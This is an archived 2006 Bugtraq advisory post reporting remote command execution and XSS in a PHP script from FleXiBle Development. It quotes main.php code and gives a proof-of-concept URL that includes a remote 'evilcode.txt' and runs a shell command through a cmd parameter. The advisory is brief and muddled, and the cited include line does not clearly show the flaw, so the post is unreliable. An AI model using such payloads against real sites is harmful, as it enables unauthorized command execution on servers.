Bugtraq mailing list archives
FleXiBle Development Script Remote Command Exucetion And XSS Attacking
From: botan () linuxmail org
Date: 1 Apr 2006 19:15:14 -0000
Description : /* ================================================= File created by Andries Bruinsma (c) FleXiBle Development (FXB) Web: http://www.ahbruinsma.nl Email: renegade () clanflex com =================================================== File: main.php Version: 3.0 Date started: 10th May, 2004 Last modified : 24th January, 2006 Last Update: New layout ================================================= Vulnerable ob_start(ob_gzhandler); //Defining some functions and including them require('php/messages.php'); //require base-file //require_once('php/base.php'); include_once "baseconfig.inc.php"; http://www.site.com/[path]/evilcode.txt?&cmd=uname -a
Current thread:
- FleXiBle Development Script Remote Command Exucetion And XSS Attacking botan (Apr 01)
- <Possible follow-ups>
- Re: FleXiBle Development Script Remote Command Exucetion And XSS Attacking Steven M. Christey (Apr 09)